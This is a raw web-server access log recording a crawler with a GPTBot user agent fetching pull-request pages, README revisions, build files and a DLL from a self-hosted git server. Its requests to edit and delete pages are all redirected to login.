"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-cpp2.md" +[17/Feb/2026:17:19:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10050] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:17:19:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/main?display=rendered" [Client 74.7.227.38] [Length 10907] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/main" +[17/Feb/2026:17:19:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/main?display=rendered" [Client 74.7.227.38] [Length 10906] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/main" +[17/Feb/2026:17:19:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9981] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&state=all&type=all" +[17/Feb/2026:17:19:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9979] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&state=all&type=all" +[17/Feb/2026:17:19:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9991] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=nearduedate&state=all&type=all" +[17/Feb/2026:17:19:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/README.md?display=rendered" [Client 74.7.227.38] [Length 11569] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/README.md" +[17/Feb/2026:17:19:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json?display=source" [Client 74.7.227.38] [Length 13174] [Gzip 4.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" +[17/Feb/2026:17:19:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:17:19:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/libintl-8.dll" [Client 74.7.227.38] [Length 11055] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog" +[17/Feb/2026:17:19:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9987] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&state=all&type=all" +[17/Feb/2026:17:19:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10170] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&state=all&type=all" +[17/Feb/2026:17:20:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9989] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&state=all&type=all" +[17/Feb/2026:17:20:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache?display=rendered" [Client 74.7.227.38] [Length 10970] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache" +[17/Feb/2026:17:20:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html?display=rendered" [Client 74.7.227.38] [Length 14583] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html" +[17/Feb/2026:17:20:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/index.html" [Client 74.7.227.38] [Length 56835] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/index.html" +[17/Feb/2026:17:20:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/html/index.html" [Client 74.7.227.38] [Length 66090] [Gzip 13.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/index.html" +[17/Feb/2026:17:20:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor" [Client 74.7.227.38] [Length 224346] [Gzip 12.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" +[17/Feb/2026:17:20:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot" [Client 74.7.227.38] [Length 174792] [Gzip 16.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot" +[17/Feb/2026:17:20:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/README.md?display=rendered" [Client 74.7.227.38] [Length 10904] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/README.md" +[17/Feb/2026:17:20:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresWatchdog/libintl-8.dll" [Client 74.7.227.38] [Length 299024] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libintl-8.dll" +[17/Feb/2026:17:20:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresWatchdog/libintl-8.dll" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libintl-8.dll" +[17/Feb/2026:17:20:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresWatchdog/libintl-8.dll" +[17/Feb/2026:17:20:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresWatchdog/libintl-8.dll" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libintl-8.dll" +[17/Feb/2026:17:20:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresWatchdog/libintl-8.dll" +[17/Feb/2026:17:20:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresWatchdog/libintl-8.dll" [Client 74.7.227.38] [Length 9797] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libintl-8.dll" +[17/Feb/2026:17:20:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresWatchdog/libintl-8.dll" [Client 74.7.227.38] [Length 870] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libintl-8.dll" +[17/Feb/2026:17:20:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/README.md?display=source" [Client 74.7.227.38] [Length 11022] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/README.md" +[17/Feb/2026:17:20:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/README.md?display=rendered" [Client 74.7.227.38] [Length 10904] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/README.md" +[17/Feb/2026:17:20:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/index.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/index.html" +[17/Feb/2026:17:20:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/index.html" +[17/Feb/2026:17:20:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/index.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/index.html" +[17/Feb/2026:17:20:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/index.html" +[17/Feb/2026:17:20:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/README.md?display=source" [Client 74.7.227.38] [Length 11019] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/README.md" +[17/Feb/2026:17:20:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/README.md?display=source" [Client 74.7.227.38] [Length 11020] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/README.md" +[17/Feb/2026:17:20:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/README.md?display=source" [Client 74.7.227.38] [Length 11020] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/README.md" +[17/Feb/2026:17:20:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/README.md?display=source" [Client 74.7.227.38] [Length 11019] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/README.md" +[17/Feb/2026:17:20:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/README.md?display=source" [Client 74.7.227.38] [Length 11019] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/README.md" +[17/Feb/2026:17:20:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/README.md?display=source" [Client 74.7.227.38] [Length 11021] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/README.md" +[17/Feb/2026:17:20:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/README.md?display=rendered" [Client 74.7.227.38] [Length 10904] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/README.md" +[17/Feb/2026:17:20:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/README.md?display=rendered" [Client 74.7.227.38] [Length 10879] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/README.md" +[17/Feb/2026:17:20:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/README.md?display=rendered" [Client 74.7.227.38] [Length 10905] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/README.md" +[17/Feb/2026:17:20:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/README.md?display=rendered" [Client 74.7.227.38] [Length 10903] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/README.md" +[17/Feb/2026:17:20:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/README.md?display=rendered" [Client 74.7.227.38] [Length 10904] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/README.md" +[17/Feb/2026:17:20:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/README.md?display=rendered" [Client 74.7.227.38] [Length 10904] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/README.md" +[17/Feb/2026:17:20:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/README.md?display=rendered" [Client 74.7.227.38] [Length 10904] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/README.md" +[17/Feb/2026:17:20:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/README.md?display=source" [Client 74.7.227.38] [Length 11020] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/README.md" +[17/Feb/2026:17:20:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/README.md?display=source" [Client 74.7.227.38] [Length 11018] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/README.md" +[17/Feb/2026:17:20:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/README.md?display=source" [Client 74.7.227.38] [Length 11019] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/README.md" +[17/Feb/2026:17:20:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/README.md?display=rendered" [Client 74.7.227.38] [Length 10905] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/README.md" +[17/Feb/2026:17:20:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/README.md?display=source" [Client 74.7.227.38] [Length 11019] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/README.md" +[17/Feb/2026:17:20:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/README.md?display=source" [Client 74.7.227.38] [Length 11019] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/README.md" +[17/Feb/2026:17:20:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 107184] [Gzip 18.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" +[17/Feb/2026:17:20:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 108777] [Gzip 18.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" +[17/Feb/2026:17:20:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 108808] [Gzip 18.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" +[17/Feb/2026:17:20:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 108803] [Gzip 18.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" +[17/Feb/2026:17:20:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 108391] [Gzip 18.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 